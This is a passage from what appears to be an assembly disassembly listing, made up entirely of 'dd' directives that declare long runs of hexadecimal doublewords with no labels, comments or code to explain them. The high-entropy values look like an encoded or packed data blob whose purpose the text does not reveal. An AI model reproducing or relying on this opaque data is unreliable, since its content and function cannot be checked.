		dd 0D0DFE33Bh, 0C877A0E8h, 0D25053A9h, 44EF5391h, 6B4F1ACFh
		dd 1A630986h, 22B38F30h, 861A4F83h, 43D4B308h, 2CC181C6h
		dd 0DC700848h, 0AB1B04BDh, 0C3A0DD88h, 20B06211h, 450DB040h
		dd 0AB03CC28h, 80460CABh, 896E443h, 481C004Ah, 0CC8B1220h
		dd 115AA296h, 0C8A5BA29h, 70C48C06h, 3729A582h,	71C87C0h
		dd 21B14E28h, 9D669C32h, 6FB130A5h, 2373FAB0h, 49DDDEAAh
		dd 3437217Eh, 0D36045EAh, 0DE27C011h, 3F8381C0h, 26E37D9Bh
		dd 0E707062h, 497B2D14h, 0EC3E549Fh, 0BB54F494h, 0D4653E1Ch
		dd 5547B808h, 0BC7DC163h, 0D1542414h, 0C73A410Fh, 0BFD4FBADh
		dd 74759105h, 0CE201000h, 422AA9D0h, 83B81A7Ch,	3C649540h
		dd 0EBCD8338h, 1F39D684h, 0DB3A004h, 5EAB67B1h,	16084EF1h
		dd 0F501103Fh, 215262Fh, 45CC94F7h, 7171808Ah, 0E542D402h
		dd 1B2EB4C5h, 42440217h, 0A010189Eh, 0B6BC787Eh, 8743CD49h
		dd 0BFC71Bh, 5A211E2Eh,	0F6A03A8Ch, 770080AAh, 2A3C4A66h
		dd 37174B6Ah, 60CC75B4h, 83038747h, 7011781Fh, 556AC6ECh
		dd 0F56183CFh, 87B40415h, 60400409h, 9BEE620Eh,	0E22DD208h
		dd 7D87C1C0h, 0CBB97180h, 94A2C00Ch, 8DEA8128h,	61512114h
		dd 64163D0Ah, 894F5ACFh, 90F1B464h, 63D206Dh, 0DAAB7862h
		dd 0B0F9D3DCh, 0C108B28Fh, 5C0941Dh, 3EBD7ADCh,	4A209D6Ah
		dd 0D113B988h, 296CC1A5h, 0CDEA77ADh, 0B233D15Ch, 404F36B1h
		dd 14786321h, 283A0ACAh, 638B9021h, 1177A4Ah, 208A5B5Dh
		dd 0CC108CCAh, 30662DC4h
		dd 0CFB45CE8h, 3D2969C6h, 424F898Bh, 232C51E2h,	0DF9C084Ch
		dd 108C308Eh, 1A707058h, 808D924Eh, 733CA11h, 5F1EC012h
		dd 9EEF2AAh, 732CB005h,	0E4C1D806h, 3C661A2Ah, 0E9E25200h
		dd 34E9BA36h, 2336A72Ah, 0A69DC3E2h, 243D2FC2h,	0D3419D07h
		dd 0D6F0BACFh, 0F0A4B08Ah, 3EDEB791h, 50AC29CCh, 49FCE014h
		dd 248E286Ch, 2C61CD66h, 0CA05628Eh, 129612D6h,	8F0188ECh
		dd 3064BE12h, 9C8ADAD0h, 3C3441D0h, 0A794D2F7h,	31257678h
		dd 5C0981C4h, 0D5C4D0BAh, 7D965950h, 3C554B41h,	0F3B804D2h
		dd 0A4D4B784h, 0D3CDFCAEh, 9500D18Ah, 6227E08h,	3C67A6E1h
		dd 0C8E46297h, 0E68454C8h, 0C1D2C4D7h, 10C5DC2h, 0E534F0CCh
		dd 64E86A14h, 0CFCE3A6Dh, 0CCD43186h, 55B553B1h, 72D54DC7h
		dd 938FECDCh, 8FA5D341h, 1855339Fh, 0C2C34DF9h,	0F1171230h
		dd 9AD788AEh, 0DE18CC0Eh, 0E52F4BC9h, 13FC9138h, 307A011Ah
		dd 0B2A2A5A0h, 92E6D36h, 9996F303h, 71B792A2h, 0A5444C22h
		dd 0A7C4E7Ah, 0C258C28h, 76748E6Fh, 731438ADh, 9B748416h
		dd 1A938BDEh, 0FE79CADh, 0F0C225C7h, 0C8338E38h, 0D8402386h
		dd 962258C9h, 63A59096h, 52596966h, 0A5A0968Ah,	5A496A25h
		dd 0AC96BA5Bh, 96CA564h, 959A5689h, 5B256E95h, 0C2572969h
		dd 0E7E36A28h, 60D9B92Ah, 178740E8h, 0DAF1DACAh, 191EAD7Ch
		dd 286B6B2Ch, 0AA79BF91h, 0F988679Ch, 9FA2888Dh, 0C8AB0599h
		dd 2E1C22A8h, 0A92F682Fh, 16AEF1F5h, 0B4022EAh,	0EF2A087Eh
		dd 0E8588C5h, 1A0DC975h, 544884C9h, 4080C3CFh, 0C99BDFF4h
		dd 0F7B072BEh, 0D6B88330h, 1D0A6287h, 81562496h, 8FA4AB54h
		dd 380E546Bh, 0ABA1AD3h, 0B5D9AC2Ch, 0BB57B0ACh, 0CB987263h
		dd 840D6942h, 8FC0485Eh, 45E0DABAh, 2D0B5D70h, 10140593h
		dd 86DC880Fh, 45D2E85h,	2F0805F3h, 0B20680F8h, 0AA957397h
		dd 77A8972h, 56A8C674h,	0C3154B78h, 48359730h, 0C0E2DB17h
		dd 0BC0A25D6h, 0E81AD460h, 9D68C518h, 580D9056h, 9D360E36h
		dd 2A556A5h, 4C614594h,	8DA934E5h, 0E6B165D5h, 1D3E3FAAh
		dd 8A609505h, 0EE9C224Eh, 0C4C20399h, 2CBE6D2Dh, 54726A97h
		dd 835FA3h, 6EC0F773h, 65CFB312h, 0FC550B23h, 449BDC79h
		dd 0FFBE06D7h, 4BDB29E9h, 9CD5B194h, 6F8C449Dh,	6749829Fh
		dd 0E4BAB5E8h, 0E6AF31AAh, 83F62035h, 0BC1C4B7Dh, 8598C938h
		dd 77D86556h, 0E95D3772h, 0FF6C7BD8h, 0D3C1BB9h, 9B3BF129h
		dd 0C125692Bh, 0E4C351F7h, 0DEFE3674h, 0DC3F99A1h, 86492DF2h
		dd 0CF4DD308h, 4EB74AEEh, 6A7615CEh, 0D623F376h, 0A95467D9h
		dd 8B6F1A63h, 0A8E449E0h, 7B0E3DFEh, 0B3BFF9C2h, 0FC07E8F9h
		dd 1D3F56A3h, 63E541ACh, 0F292514Ch, 2C2B6F27h,	9C486372h
		dd 0EFE5B659h, 4D89C34Dh, 0D4EA9738h, 55977652h, 0D5769772h
		dd 78581C2Ch, 0B2E592D0h, 0FA2CD4BBh, 6CF235A8h, 0B862CC70h
		dd 0B4751B67h, 1E33E883h, 493391FCh, 0CF5B0B35h, 877D2E1Ah
		dd 0B54422Dh, 0C1D24661h, 16C9BC7Ah, 9977A449h,	0F6BBCD84h
		dd 0D3670C8Eh, 4E695AAEh, 0C53A9FCAh, 0CE56FE76h, 0F975A3DDh
		dd 82C7AC90h, 58F4B788h, 0A13E4612h, 1102E3E3h,	3F5FFDF6h
		dd 43D76CA8h, 693EFA3Fh, 0C9AF95E2h, 0E3C6B3F9h, 0A136AC2Eh
		dd 0B8BEEEE5h, 0F3B74F27h, 5F5A7E96h, 0FF528754h, 7196882Eh
		dd 6F57D9C1h, 0C7E33CDFh, 56E45AEh, 9475D424h, 43965F7Ch
		dd 8D428439h, 3BA6FB14h, 2C4DE76Fh, 138150C1h, 3E748C05h
		dd 4EB7C2ABh, 4E633D08h, 2ED94384h, 0CDD3CDEBh,	0D43C48C6h
		dd 6DBDA51h, 1285028h, 1E8D4444h, 0DF5BEE14h, 55121319h
		dd 0B2F25394h, 4C4F16D3h, 0FFD55141h, 2DF89BDFh, 0C94544D8h
		dd 0E5A2D3B5h, 16126B12h, 0E3C9545Ch, 4CA49AD3h, 0CF51813Ah
		dd 54A2D9E5h, 1913C725h, 0A7CE1468h, 4DAF5719h,	8B51B12Ch
		dd 0B9CD65DDh, 4704BAC0h, 0A575951Dh, 2D30AC73h, 0EDDAA51Eh
		dd 4A5753F7h, 41DEA8F8h, 9B5A9C47h, 6A4026Ah, 0FBF66F72h
		dd 90891099h, 6D25AA44h, 24FE43FBh, 3AA46279h, 21DEFDF2h
		dd 9209C2C7h, 0EA27AA4Ah, 20EA42B2h, 6A4C25BFh,	5033CA4h
		dd 0E25C2DD0h, 0E8529409h, 0FC97F4A8h, 0CA52249Bh, 924EB8A5h
		dd 427B655Ch, 4AD29589h, 0DFD9E573h, 0AA58277Ah, 0C7AFC5A9h
		dd 689A8D95h, 0DE78A5C2h, 79B5DEDAh, 3A97893Bh,	9AE0A28Ah
		dd 60259207h, 0F1A62988h, 4C2036F2h, 342DE52Eh,	0CCA64191h
		dd 0CBFE3A0Ah, 6624C37Dh, 548329A0h, 918A97BFh,	0ACA6A1A9h
		dd 88677E76h, 5AAC920Ch, 0A6C12A90h, 5C6AEA6Eh,	26E3A3BBh
		dd 9929C09Ch, 8E8748E2h, 9C8953D5h, 0D06A2A74h,	2667D78Eh
		dd 0EFA9D89Ah, 8299BF0Ah, 9E0963ADh, 7278AA7Ah,	272F1541h
		dd 0F1A9F097h, 32F63BBAh, 9F89A3DCh, 6CBACB00h,	27F0C7BEh
		dd 0BAB02258h, 25F17A1Ah, 0C10972D5h, 0FC342B06h, 27B27364h
		dd 8D2C2092h, 88F58E46h, 0B0A27A7Dh, 7DEA7E85h,	618A2B79h
		dd 0E36C961Ch, 495D4EE5h, 0E3588133h, 961937ABh, 9D3E93F2h
		dd 0A0FC2E04h, 878FB8C3h, 7463DEBFh, 737AD7Dh, 0ED7AAF06h
		dd 0EDDEEBFDh, 3CD7D775h, 6F8BDCB5h, 567F841Bh,	4CA2B1A2h
		dd 0E2DF6C70h, 0AD74343Ch, 208767F1h, 18DD1E39h, 139AC2EEh
		dd 263097D3h, 0F23FADDFh, 0B728C9C9h, 38F40BDEh, 0AF9532DEh
		dd 6FB93158h, 515CF4F2h, 990D8867h, 389678EDh, 0F6D429Fh
		dd 72F7DD4Eh, 2D32557Eh, 0B2FF3392h, 95244F67h,	0EBAD3AD5h
		dd 0DBF975F8h, 0BD628F4Ah, 0C6466896h, 0CEC67A0Bh, 0C1AEE777h
		dd 7CB83F56h, 0F936954Ah, 735628BFh, 76E130ADh,	406B3919h
		dd 0C94877DFh, 0B1EC97C5h, 6630BE07h, 0FECF2699h, 94889BACh
		dd 5A30F4ADh, 0A63B4F8Fh, 0FCD921B2h, 0E8676F49h, 4FFD6FA3h
		dd 0B48DAD1Ch, 8B00ABFBh, 0D08E4EF3h, 0E6A8494Eh, 0F4FCAC22h
		dd 0A1452BFCh, 653FCA85h, 97C66D1Dh, 0AFAA185Dh, 1C179B5Ah
		dd 0A86947EDh, 93E95AA1h, 0C56BDED0h, 7F6A8795h, 0E6437E89h
		dd 0AA204B40h, 2BFFC400h, 740CFE5h, 0DA387464h,	476E4597h
		dd 72879DB9h, 39DB87CDh, 0C5DC7A18h, 0C1FE668Dh, 746E054Ah
		dd 0D24ED3D9h, 40D08E00h, 0A3A6E0BEh, 18201869h, 3F0E9859h
		dd 686AE71Ah, 50717828h, 57E48182h, 32B59030h, 10007CA5h
		dd 8004DD03h, 0F9101208h, 66082818h, 0DD014C24h, 1822229Ah
		dd 33073164h, 0BB0BCC21h, 8C34A002h, 59BA9163h,	24250A70h
		dd 293A860Fh, 5D91604Ch, 192AD051h, 0AF670974h,	0F06F56DCh
		dd 15C36391h, 5D90C576h, 42174533h, 0DB8BBBB7h,	475F174Bh
		dd 53675727h, 3F43332Fh, 2B231F1Bh, 134F076Bh, 630F5B0Bh
		dd 3B3478B6h, 0C6CC023Fh, 18216D00h, 1E021B02h,	9936D69Eh
		dd 0AC39305Ah, 2ACE8A01h, 6EAADC0h, 0ADA60219h,	3E46B097h
		dd 68E9680Eh, 5F8AC23Ah, 3EBCB7EBh, 5C7646A1h, 2D0AFB1Ah
		dd 0E27416B6h, 219C15h,	5725F26h, 67F8D65Fh, 64AB0FBCh
		dd 84032B7h, 300539CBh,	0F43F138Ch, 281255CBh, 0F6BA7F2Eh
		dd 50E82628h, 0B8DB801Eh, 0A1061A66h, 0F4678667h, 44608467h
		dd 865D9E82h, 0BDFD6CD6h, 0EA079822h, 15579D0Fh, 3E651A80h
		dd 0AE75B614h, 3B519D5Fh, 8352FCA1h, 0F5731A6Fh, 3510C66Ah
		dd 8B3031F2h, 2C098CFCh, 36A5F0E7h, 2F10404h, 89D61E0Ch
		dd 5EA02ED2h, 83AA2196h, 6241F93Ah, 988082E9h, 1E1E9105h
		dd 814028B4h, 0D997D980h, 5727403Fh, 2D671F80h,	98620625h
		dd 302AB6A3h, 572E8A49h
		dd 12D31690h, 0A01CB18h, 54BAC4Eh, 0F49A11BBh, 0AD39952Bh
		dd 2D9C455Dh, 7AF477AEh, 834FF1E6h, 39A0FF54h, 6AB49AA3h
		dd 8C115ACDh, 3CD95A59h, 0DA612A2Dh, 104F0A82h,	44F1A166h
		dd 1C76292Dh, 2555A81Dh, 0A0D50101h, 7FA719D4h,	342ECAB2h
		dd 6941BABAh, 0A1B8308Eh, 0A921CAB1h, 0FB4B9DE8h, 0DAAD49Ah
		dd 9919952Eh, 6646B0AFh, 18804002h, 280020Bh, 0F52D4EAAh
		dd 10CD5E2h, 88152B74h,	0FA989A36h, 2C6D39Ch, 0AA65707Eh
		dd 12028EB9h, 0C00BA2B8h, 0A21694D7h, 540CC98Ch, 0E664B2A9h
		dd 369C1595h, 40184Ch, 780940h,	14EA0C1Ah, 0C6E6AC31h
		dd 0D3660CE9h, 8312731Eh, 0F0184C91h, 0C9BA0D85h, 1BAA7A7h
		dd 0F3EDE0F3h, 0A93B2BB6h, 0D743E030h, 0D1BEE1ABh, 1C2ECE70h
		dd 330C68BEh, 4A006967h, 26EE7320h, 415CEECBh, 324B0280h
		dd 7E35AEB9h, 431861C4h, 0A7BAE5E9h, 54576BE4h,	57C64560h
		dd 7277CB9Eh, 61CD2861h, 9B742954h, 0B7923F68h,	42E00C15h
		dd 3B7584BDh, 0CCE3ADB8h, 0CC59A322h, 408946B4h, 9B771266h
		dd 2076A73Fh, 9C03207Dh, 4D5D3105h, 89863F66h, 207663F9h
		dd 88366E0Ch, 6407C620h, 464074A9h, 3CB5275h, 356C71D6h
		dd 614624D1h, 0FED01A1Fh, 1743497Ch, 0FCA8B78Ah, 831282Ah
		dd 28305A58h, 965C8052h, 0CB4426EEh, 0CF80A65Ah, 6EC16AEBh
		dd 3E330A2Bh, 3BC798A9h, 4A482960h, 0B049F651h,	65CC07FCh
		dd 0A793B19Eh, 634D51BCh, 634772Ah, 6B44E0D9h, 5649D528h
		dd 0B4DAE50Dh, 0D6636064h, 2EB9021Fh, 62043545h, 301CAB68h
		dd 6940F51h, 4485A994h,	4A691A70h, 5C1724F1h, 136E2Ah
		dd 0E29068FBh, 0DA0BCA81h, 44F2A93Eh, 7DEA1500h, 1710EB9Ah
		dd 843A2340h, 788125A1h, 0B3315DBBh, 1176F067h,	0AB27A891h
		dd 0AF45F071h, 4A4BEF6Ah, 3505DD1Eh, 0B8185EE8h, 18B76053h
		dd 62DD8192h, 71231C0Bh, 0DC5D0F64h, 88083E71h,	932BCD0Ch
		dd 0A8C8E2A1h, 6CC182E4h, 0F05AA0A1h, 0E16530EEh, 96E94AA7h
		dd 0BEB690BDh, 10E30840h, 6E6C6A8Eh, 5D5DC9A8h,	98CCB37Ah
		dd 846A0A48h, 15462848h, 0E4907423h, 0A590E834h, 250C3486h
		dd 10086CE9h, 28B38BF1h, 8EA6DCBh, 31CBC831h, 7A258416h
		dd 258C1952h, 1F508860h, 0D6A6BEDDh, 0C05E0B93h, 0FDF9F2A4h
		dd 2F50E885h, 29765BCAh, 0FC738586h, 434E96D0h,	7C7DA043h
		dd 684B211Eh, 42A734A2h, 8CEA83h, 6C71EEBCh, 0BBB3F449h
		dd 0F6CC4051h, 3CE48318h, 38EB6604h, 9F65A814h,	0A9C7585Dh
		dd 18AD88E6h, 5C7F226h,	34C021C3h, 481B2141h, 0E2295BA1h
		dd 0D42AA04Bh, 69297803h, 0AA000A59h, 29B68BD5h, 74172A54h
		dd 132885A8h, 52F01604h, 55DE604Bh, 9356B01Ch, 0D26A0C13h
		dd 2AF664C1h, 7283DD44h, 0B4B08A28h, 51B59181h,	0CB4265B6h
		dd 0BAE5C4B4h, 0A0A49425h, 0EA1DC540h, 0D579E461h, 85674086h
		dd 98499B00h, 94C850F2h, 3645EB91h, 20EF4F0Eh, 0F5C329ADh
		dd 0AC0097C0h, 0D1C2C8D0h, 0A9AAE620h, 0EB004FF8h, 8C8AA98Dh
		dd 81132A56h, 96C96D85h, 6D82C402h, 36322C59h, 3A64D457h
		dd 7E496514h, 0B1D4636Ah, 0DD96BC1h, 5FB9A3EBh,	919A5E17h
		dd 27196A80h, 0D967654Ch, 3E691AF0h, 660A609h, 7802983h
		dd 260F08AEh, 6A38799Fh, 1162B66Ah, 0E0BBB83Ch,	869A0162h
		dd 2C40125Fh, 6E8828E8h, 2FC58015h, 31122C18h, 0A35535ADh
		dd 502D0355h, 5D9F12E6h, 1963556h, 0C0580A1Fh, 35386D6Ch
		dd 80673B5Bh, 2C54B62Dh, 0C0DE0E4Eh, 0B35B2AF7h, 421774FBh
		dd 6031B049h, 0D4503492h, 44228043h, 0C294A1C8h, 9321A295h
		dd 2AA840E7h, 81DA70C0h, 53C8BBDBh, 18C03BA5h, 92802C1Bh
		dd 19189ABh, 0D49F030Eh, 924055FFh, 0A91EDA02h,	0F10046Ah
		dd 12243385h, 4AB14340h, 9892FF80h, 28113532h, 31E28147h
		dd 7C437122h, 61472601h, 0E30890B0h, 0A640528Ch, 20C8185h
		dd 208222CBh, 9F31A280h, 0D50A734h, 0A4C29D02h,	4AC00836h
		dd 0C2AD50E0h, 49405933h, 0EA827DB0h, 0BD868B4Ah, 7DAC4B68h
		dd 9C104D28h, 0E99C4FB9h, 143E490h, 0A881E7D0h,	10609225h
		dd 103C0A25h, 101D3C92h, 14F3D134h, 2324D5C8h, 9B93CA23h
		dd 263DE880h, 84873D93h, 3E9A4893h, 0C9229196h,	1931EC8h
		dd 25D04794h, 0B046E874h, 53134507h, 1390C69Ch,	2C4A323Ah
		dd 602449E5h, 5CA46Dh, 1E44010h, 63855468h, 7280C98Bh
		dd 0CC70A003h, 56028698h, 0C98F5712h, 0B423D584h, 7EA627D6h
		dd 0C4B309F6h, 0A0489933h, 0AD88FD98h, 4FB08979h, 13EFA021h
		dd 49193330h, 88FDE44Fh, 0B3894C24h, 89E50010h,	698C99D9h
		dd 0C47E6385h, 1B6814h,	251931ECh, 62598478h, 0CA3F5F13h
		dd 0EE625C84h, 0FBB09791h, 1EE623F7h, 213EF445h, 8C9F192h
		dd 54F24808h, 3302AC99h, 8B70127Dh, 822F4524h, 0A9E11BEAh
		dd 16092A79h, 70041BE3h, 26704934h, 0C3A5824Ah,	9E460287h
		dd 58C98F6Fh, 12E423D1h, 847ED627h, 0D2C4BF09h,	0F4224C84h
		dd 50AA392Ch, 47EFC27Dh, 484A8926h, 4F2A8958h, 11EA423Fh
		dd 31C2800Dh, 640A1C83h, 263DA04Bh, 588F5911h, 0FB209F5Fh
		dd 12EE27DEh, 0C4BF08F5h, 0F11FBB89h, 0F6612944h, 9D3C9C02h
		dd 0D10AB26h, 66611F98h, 0E14006DAh, 50DD193h, 1EC22590h
		dd 478CA3F5h, 0D13B0948h, 43134978h, 1653D2C6h,	0C8FC404h
		dd 327CD0C8h, 0D7008F25h, 2F6250FEh, 721344ABh,	296052DBh
		dd 0A5DC4A1Dh, 0CF428695h, 0F92D9952h, 0AB921A9Dh, 0B95AE723h
		dd 53251426h, 846C5F36h, 82464505h, 0C9C6432Ah,	4128A131h
		dd 0A2B40559h, 832B8103h, 0B0970087h, 30AAE4E2h, 0CD99A4A1h
		dd 2C34B060h, 3FCC2174h, 1822FF27h, 59660CF8h, 30827518h
		dd 81ED4CCDh, 3F2F1374h, 0FCED4E13h, 0F3873A4Fh, 0CF3CED3Fh
		dd 2CB3C4FCh, 82D0D3CCh, 23DC9A3h, 38734A9h, 546C7810h
		dd 0E8CA9564h, 876FC53Dh, 3CE63103h, 0D8AA9B44h, 7E76EACCh
		dd 41B9D1ACh, 279D84FAh, 0FD5A69C7h, 31475AA3h,	735D5F66h
		dd 8DCC0E01h, 88372F98h, 54F3A09Fh, 5EF169E6h, 311EE4E3h
		dd 0D4508AB2h, 6E59322h, 0A247E43Fh, 26EDE0B7h,	6F24B5C6h
		dd 0B78752CDh, 1B91CDCAh, 677B7004h, 1E8FF119h,	64C14585h
		dd 0EE2848F3h, 8045F189h, 0ED2EE8FBh, 878A3042h, 38E8F009h
		dd 65257427h, 28120496h, 90EBC80Dh, 0B43265CAh,	54690D3h
		dd 68D41F77h, 776994D0h, 21AB1553h, 41F389BDh, 60E4155h
		dd 86372BBBh, 0E070B095h, 62031FB7h, 6082C92Ch,	765C6B81h
		dd 9785167Ch, 89B4348h,	6251DE1Bh, 2C3E4E78h, 884F4AB1h
		dd 3E6252Ch, 69553237h,	2B5D1070h, 0B8956407h, 0CAC7490Bh
		dd 6155823Fh, 221D4538h, 3F365DA5h, 0B23DA0DEh,	4FCB5F8h
		dd 53CE0310h, 3D57F232h, 6E4A7CCh, 0D81F909Fh, 6B507E50h
		dd 3E89E721h, 3E837D96h, 965A7BF5h, 70235BCDh, 0F66687CBh
		dd 37F41C30h, 455488DCh, 0E3C1A824h, 7C654ABFh,	4A28AC71h
		dd 0F73A26C7h, 87A00326h, 33361C7Bh, 0CC9CFC69h, 0CB2E6846h
		dd 6540569Ch, 4CA4B93Ch, 0F0C41943h, 26CFC798h,	0C79A4DE2h
		dd 0D4074246h, 97B1C64Eh, 13A480A2h, 0E283F300h, 0E82A52AEh
		dd 72E242D6h, 897A6E05h, 953D1ECAh, 27F5D11Eh, 0E026F36Eh
		dd 68C10901h, 62079E7Ch, 7A1F157Ah, 336CEC51h, 40CC5D59h
		dd 0A3034A21h, 30559836h, 52904C1h, 0E9068225h,	0F097BC00h
		dd 0D302465Ah, 435BC8BCh
		dd 0C0E60260h, 0D80AE41Dh, 0BC1ED831h, 87F6BD1Eh, 0F022BDD2h
		dd 47A21314h, 570EF3D1h, 0CA022BD3h, 647AE08Ah,	0F5C51ED0h
		dd 22BDA647h, 0BA09FCC0h, 3BFFEE11h, 22000000h,	6000h
		dd 424000h, 4000434Ah, 0
		dd 3C740000h, 25AC20C8h, 0A5D31220h, 6B7D4801h,	5F2BF335h
		dd 72B0D6E9h, 0F65A6629h, 0ED90DBACh, 245805CCh, 0E979A922h
		dd 6BF6A152h, 9ADEB859h, 6189B75h, 580510B2h, 0D81CA044h
		dd 62BBCEF6h, 677F29DEh, 0C02FBD8Ch, 4D664422h,	0C02ED10h
		dd 35762024h, 0AC76EC45h, 9ACFB0D8h, 0DAAD4B2Dh, 6DBA68B4h
		dd 0B8DC76CBh, 2EB7DF70h, 0E2F394BFh, 2836BBDh,	0D1287A62h
		dd 3D2242A1h, 0A5D3B46Ah, 0EA7D934Ah, 52A929B4h, 0B56A42A3h
		dd 0B35AD52Ah, 3ABBBD62h, 0AAA822C0h, 0AF842C08h, 284B05Eh
		dd 2821B85h, 90344603h,	2BC94234h, 769B2C18h, 0A1D2390Ah
		dd 73FEBE99h, 2502A660h, 23D0FE2h, 0F074FD80h, 6A664060h
		dd 7FC97DA2h, 8B6EA60h,	0AF509406h, 0C973AC60h,	427153B6h
		dd 52BEF45Eh, 0B4D6A23Eh, 42058275h, 28086903h,	0C4C67518h
		dd 56D4F6ABh, 8B9D02BEh, 7BC14E64h, 637E3EC7h, 0C9EFF942h
		dd 35FF63A2h, 1B10A091h, 181D004Ah, 45A15015h, 0EB40FB31h
		dd 7A713082h, 4CB05AB1h, 60F44F62h, 42D17B5Bh, 0F14E7C40h
		dd 80F342h, 1129060Dh, 0F6018610h, 2CACD89Fh, 2503814Ah
		dd 8949180h, 2A50608Ah,	0C9426128h, 0A50CD4A0h,	9D095283h
		dd 30E54A10h, 0A2CC4E85h, 143D0B47h, 830A7901h,	0A24C9628h
		dd 14855114h, 0C2150903h, 869D3A6Ah, 4AA4053Ah,	4D825063h
		dd 3055C315h, 0AD8C2ABBh, 5290967Ch, 4A38315Bh,	0AB3A2570h
		dd 160195C9h, 2C10CC6h,	882CAD3Bh, 11921609h, 52941A76h
		dd 21682C8Ah, 0B48CB3CCh, 0D3B65A43h, 0DCE6E169h, 0E9D1ED41h
		dd 819820BAh, 8B32883Ah, 3E61A1A2h, 881D6865h, 0F43285D1h
		dd 0FE2B18C1h, 8025B7A3h, 0FA2A276Eh, 0DAACE553h, 365EBDC0h
		dd 106B0501h, 821AF8E6h, 925EC50Dh, 0A04D0249h,	2746017h
		dd 6015D9FDh, 0FE96505Ch, 451D5FD3h, 2F070214h,	0F06265A1h
		dd 8612AA82h, 210E6D00h, 4CAD9621h, 4021F87Ah, 944A6E9Ch
		dd 0C12888A5h, 44A32495h, 128C9A54h, 0F4210943h, 5894A5E4h
		dd 0A2511A4Bh, 89476D2Bh, 251FC4A9h, 0E7329296h, 99004B91h
		dd 0A598A818h, 224B2190h, 42F0F321h, 2BCAF1E5h,	0AF4997A1h
		dd 0FE255D84h, 0FE967212h, 952AC44Bh, 80B0D0C9h, 93E3556h
		dd 114E0EF4h, 0D82081A7h, 38109FC6h, 0A3A05C10h, 4ECBB614h
		dd 0D4A16304h, 0E47B23D8h, 641109D8h, 3D921E8Fh, 68F4EC8Ah
		dd 832F47B2h, 18A80D71h, 9D920AD6h, 0F58A112Ah,	0AFD9AC40h
		dd 3297C364h, 0A6DF6F16h, 92710BA5h, 0B17B6E55h, 7D507822h
		dd 8E21D0C8h, 5804C600h, 5E122C22h, 684AAF89h, 512AB825h
		dd 4A6C095h, 12964254h,	4A48894Ch, 28E22528h, 0A2899481h
		dd 86255184h, 8974412h,	87C1084Ah, 5E02F3E8h, 76002F42h
		dd 23CAC60h, 896D87A0h,	259C84B7h, 965112D4h, 57444B30h
		dd 42602C42h, 0B2FAD09h, 0E0218A95h, 0D03B5E52h, 4FCB9A53h
		dd 0CE818760h, 4B95FB00h, 0AF429089h, 8AB3D3Ch,	2905E82Ch
		dd 56482B30h, 2601C9C6h, 610BD329h, 10220BAEh, 9ECA9956h
		dd 88468D38h, 0C9060AC1h, 4C967065h, 1A69419h, 301A1972h
		dd 0C8061FE7h, 0C395065h, 61A99001h, 861E1020h,	0D6F04600h
		dd 20697F3h, 0D32E0346h, 83D60A91h, 770C6437h, 0DD80F043h
		dd 25F4B990h, 97B12186h, 508F4A16h, 0DE428AAh, 40C4F3C0h
		dd 2437F5BCh, 0F1C37FCFh, 862CE3FAh, 28BA7C00h,	2F0497A1h
		dd 8645E03h, 12923770h,	4A4A6976h, 293225D4h, 2F009731h
		dd 0FE995C03h, 3ECF77C2h, 71B7F876h, 4247DFDh, 0A3C2CC03h
		dd 30604288h, 6D7C0A1h,	3E1FC206h, 2076060Ch, 0EA8E1FF9h
		dd 950AA854h, 7B916C7Eh, 8442320h, 8320A8Dh, 0CC180ABEh
		dd 29DAA6A3h, 2033A479h, 0D40455A7h, 7CD22E96h,	50987A89h
		dd 4ADA88C0h, 3274254Eh, 9777558Dh, 8ED1ED31h, 5F218818h
		dd 19782E9Ah, 52B6E20Ah, 785908D3h, 2AD0155Eh, 44D0FA32h
		dd 204D0F3Eh, 31D01FE0h, 3515D94h, 21433A3Dh, 58C9A730h
		dd 0F6D91876h, 2740257h, 9105D341h, 0FD42395Bh,	59C860CCh
		dd 50E11163h, 6927622Dh, 8A60C3D1h, 88B2D224h, 0DE6F32D9h
		dd 904D2920h, 378EA329h, 687DFF26h, 71CE9A22h, 9C76BCCEh
		dd 0CF6D174Eh, 0BD4641F0h, 9DB46E12h, 577FB78Bh, 2C6B9DE8h
		dd 8CFAB25Fh, 6E391D4Fh, 5687F067h, 0E3656EBEh,	0F1DF0E82h
		dd 41443AFCh, 6258CEFFh, 2DC9F6E0h, 0CEAEF298h,	0FFA4D393h
		dd 1E89B9Fh, 0C6F0C7EFh, 380E76DFh, 7593633Dh, 77984D1Fh
		dd 564FD450h, 0FDEE5B5Dh, 0E50839C6h, 1DDE1E0Bh, 7F7EEF77h
		dd 0AAA3FCE7h, 0F9AEBBF6h, 67CA43D0h, 0C260DE3Eh, 4944532Fh
		dd 0AAFC64D4h, 78F8422Fh, 0D1DF6B8Bh, 0A9F3BC4Fh, 0F0D25E9Fh
		dd 5E7DFB96h, 0CCE3AF59h, 0DA6D16CBh, 33E3E461h, 0A1A77682h
		dd 0CBAED1D1h, 52EDA2F0h, 536B070Ch, 269FC9A4h,	9DCD142Fh
		dd 2F6D2739h, 0BF2D771Bh, 0C5284CF1h, 9EC9767Bh, 0E6347B17h
		dd 0C8356BFh, 0D2E3DF0Dh, 1E8F8154h, 5A2726F6h,	0D771F717h
		dd 0DD9FD892h, 0FC7C3F9Eh, 0FD175595h, 7701E4FBh, 727320F7h
		dd 62A6EA6h, 0B0717979h, 56FB0552h, 300224B7h, 0FDCF4E6Fh
		dd 0D8571804h, 7001EE33h, 0DAD55F47h, 0DFA76FC1h, 0F6E89277h
		dd 0EA77E372h, 9659960Fh, 2AC487D3h, 0D1F8633Eh, 43E45F6Fh
		dd 3C6C9DE8h, 8BA7784Ah, 0A0699EB3h, 9B66F71Dh,	0BD9BB6D6h
		dd 6766BE0Bh, 0E50AE1BDh, 0EAE573DDh, 6F39F5E5h, 0F49737FDh
		dd 8488DE17h, 9ABF3AC3h, 7D32DDF9h, 0A6F121D9h,	4CAFB7E1h
		dd 772437D9h, 3BBA9B92h, 0B14366A7h, 79DED139h,	7594F9ADh
		dd 75B1F59Fh, 3CC19CD1h, 8F8DED8Fh, 6EA7D924h, 0E2EE2DEh
		dd 0AD56731Bh, 0BF6CF474h, 0C896B3C1h, 77AF6A77h, 0E360EEBEh
		dd 9616EE97h, 0A204DBECh, 2FA62BFBh, 4FEA813Dh,	25467252h
		dd 0CD0FBFEAh, 64BEEFBAh, 1DDA9379h, 0C77B51BAh, 2475ACFAh
		dd 0FFF8373h, 0CF4A4BBEh, 519B91C0h, 4B437EA7h,	3593D58Eh
		dd 27A398F0h, 51F2C90Eh, 3FDE38C1h, 0B988FB82h,	237BBCEFh
		dd 8F0DAC42h, 9DE31F47h, 0B428A681h, 33756128h,	0E5D33EDBh
		dd 0C6399BF6h, 9999A99Dh, 390AD291h, 4D877BA9h,	2AFDD4E7h
